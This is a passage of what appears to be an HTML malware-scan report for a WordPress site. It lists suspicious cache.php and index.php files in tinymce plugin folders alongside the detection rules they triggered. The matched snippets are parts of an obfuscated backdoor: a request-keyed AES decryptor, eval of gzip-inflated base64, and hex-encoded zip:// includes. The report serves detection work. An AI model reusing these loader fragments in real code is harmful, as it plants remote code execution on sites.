</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_29").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/plugins/textcolor/textcolor/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 373.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:54</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_30" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$SX</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@include_once </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x6f\x67\x76\x5f\x36\x39\x37\x38\x37\x31\x61\x36\x64\x34\x61\x65\x32\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x31\x61\x36\x64\x34\x61\x65\x32\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">include_once </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_30").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/plugins/textcolor/textcolor/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 418.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:54</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_31" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$SX</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_31").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/plugins/paste/paste/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:51</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:51</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_32" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'8eOKU6P8HFEbF+2DrlT1QGhseKjXWF7Zsd/7zvfyufexxHvwwPfG85FGQ7fthdv+kw14RP6pjPv7vh6HW+ENvG7GYXKTDXuu9eyFb++y9nv3Tnd9Gn4lLe7uLeTtLf8pDUsA3rxbm8NGvK54T9/Zikia/tRZu/NbZxfvvI7oP+7bOrGlEWDaGjSC318XNjkS8dzn+t+1skPvajDQFsHUuU0rZlxLdL2LAA4NRvgCjyq2cwESftfjpOrrvlTUSP5/AZOfKToDEnMDszhIkUiTgKMMQGYZ6ARyykQ46+NMBrg7rg4wDs/fxYdIiR9cDphKRRY6hT83Nkt3uoeStytIeXga3ANfZz5nddDXHpyWvaVqpIzQPUdee/IWs+svIreck/fx6dezvbdsL/+bnGDrLcCRxaQ1d1EbxuedaFtDsvanOhEvHh+tbq++bi6n+v3HeGanQfFkZNqgMkgHbPKGI60NuqPKY2ZEPm3r4J8ztwrJaYNpjnV...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">raK</span><span style="color: #007700">(</span><span style="color: #0000BB">$lSh</span><span style="color: #007700">) { </span><span style="color: #0000BB">$pgJtZ </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$vkxHP </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$pgJtZ</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$GLfU </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$lSh</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLfU</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$pgJtZ</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$vkxHP</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">raK</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'sI3FncptiDGuhI2WUK1rWjoSrM/k9G+0</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$raK</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$raK</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_32").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/plugins/paste/paste/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 47.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:51</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:51</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_33" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"eS5naWY"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_33").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/plugins/wptextpattern/wptextpattern/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_34" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'dwzsM9D/RBxWhv9wa5UNkRIrnx4l1xeOb294o3fRmLO/xjHZxDvH/xpGJ3Pr+7XfdwM9yhHf8bVf1WfSlfRzbxuB2lS3wlrXPO+81bO+/3l9w3uejX8ylvd3Ev+2lPu0BuWk9a8mJftxriO+UzfWIpo2fbUm7fzWX837LyP6j/xmzqRJh9QmCXpg7aeonRyJ/upT/RvaW1nXsxRoC2DKXI61tyoVvBrFRAeT0Lowo8qNHMh0X7Xfqz6hteqS6J3nILwzZCVk9yEguHuwSImRqzwAZghJDFJLTDhn704ssQivCjL/389lj3hYG0zdkEikFihXPydXQ3eri7NlK2O4f8utD20lNXY21P8djX6a1patFZGaho7x35oFrP/ryqnE9/XsRX287WF9iv/2pxw6CnQUsGUdXNxWsrXnWR7E7r2ZTIx7RUQ7mqv/mo+t979hnh2R0XBZWjKIDJ4x2jiBiOdjr6jBmdGxj59KeC/cL9aiGWT64Zl...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">FYw</span><span style="color: #007700">(</span><span style="color: #0000BB">$fAPc</span><span style="color: #007700">) { </span><span style="color: #0000BB">$NURwP </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$YxeHk </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$NURwP</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$PXe </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$fAPc</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$PXe</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$NURwP</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$YxeHk</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">FYw</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'6bgx5kTnocpwHmqVwRbmnjK1IY02ZUhm</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$FYw</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$FYw</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_34").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/plugins/wptextpattern/wptextpattern/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 47.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_35" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"Y3VJUXEuZ2lm"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_35").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/plugins/compat3x/compat3x/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 371.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_36" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$N</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@require_once </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x6f\x67\x76\x5f\x36\x39\x37\x38\x37\x34\x30\x61\x65\x32\x63\x31\x35\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x34\x30\x61\x65\x32\x63\x31\x35\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">require_once </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_36").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/plugins/compat3x/compat3x/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 413.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_37" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$N</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_37").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/themes/themes/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:51</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:51</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_38" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'owOXp8A+jCitAf7h36JaIrQWNjxLpr9c0u71r/PRlHu/yjXZwDfG859Dq1P1+5zPNaue64TO85iPHrvpyjo53afA6cx746FrUt//wj3v9Y9f/mDX7KPc5bX9ytT96rX9giF5uB3pxbn8pmvP24TFTJit2K9p95s1F7f+j/vO7oP5vbMiaFE5zZKYtivqZhcCtV+0++/GV6ZVbewKjxISHoetoH2Fb2+BEmHE8NSsIiizDWc90ydn7tqIrn20d6phwPgskflJsB1I7g7cEiJk4GoAHTkCSWOS0cMJMOubLjwLx+KPOcf57XMWDyYXLnQZgSUFie/F3tDa7dLpjkreHg/7jGNZzH2d9JX34nOWdrWrSlVmJ4GseHeh72vys/Jh+8l73xFfuztf50L9aLkOzLIVqBxXUVc147xpW9aA9jtmGXMuEPEep9bvKubr+f3obndE+XQW1kaCSAOs8nYAqWL4o9sgbmZ8ZUPin77HQju4j5YedZh...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">BaRkq</span><span style="color: #007700">(</span><span style="color: #0000BB">$xySmz</span><span style="color: #007700">) { </span><span style="color: #0000BB">$pTjV </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$bHy </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$pTjV</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$euy </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$xySmz</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$euy</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$pTjV</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$bHy</span><span style="color: #007700">); } if (</span><span 